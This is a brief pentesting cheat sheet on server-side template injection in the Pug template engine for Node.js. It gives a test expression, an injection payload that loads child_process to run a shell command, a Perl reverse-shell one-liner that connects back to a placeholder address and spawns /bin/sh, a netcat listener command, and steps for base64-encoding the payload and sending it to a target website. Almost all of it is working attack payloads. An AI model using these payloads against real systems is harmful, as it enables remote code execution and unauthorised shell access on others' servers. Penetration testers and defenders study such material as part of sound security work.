Pug Pentesting

Pug is a template engine for Node.js.

Server-Side Template Injection (SSTI)

#{2*2}
#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('id')}()}

Reverse Shell

First off, create a payload.

use Socket;$i="<local-ip>";$p=<local-port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
```
Encode it with Base64.
And start listener for getting the incoming connection.
nc -lvnp 4444
Then prepare the full payload contained the above Base64 encoded hash.
Copy it and paste into the target website, then send a request.
You should now get the shell in your terminal.
